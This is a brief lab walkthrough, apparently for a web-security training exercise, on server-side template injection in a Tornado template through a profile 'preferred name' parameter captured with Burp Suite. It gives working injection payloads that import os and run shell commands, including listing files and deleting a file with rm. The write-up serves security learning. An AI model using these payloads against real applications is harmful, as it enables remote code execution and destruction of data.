We have a hint:
Tip: Take a closer look at the “preferred name” functionality.
This function is in “My account” page, and it change the name displayed when we comment on a post.
Click “Submit” button and catch the packet with Burp Suite, we can change the value of the “blog-post-author-display” parameter.
For example, use payload:
blog-post-author-display=7*7And our name was changed into “49”.
This lab uses a Tornado template so we use python to run system command.
To list the files, we use:
blog-post-author-display=user.name}}{%+import+os+%}{{os.system('ls')
And to delete file, we use:
blog-post-author-display=user.name}}{%+import+os+%}{{os.system('rm+morale.txt')
ethan 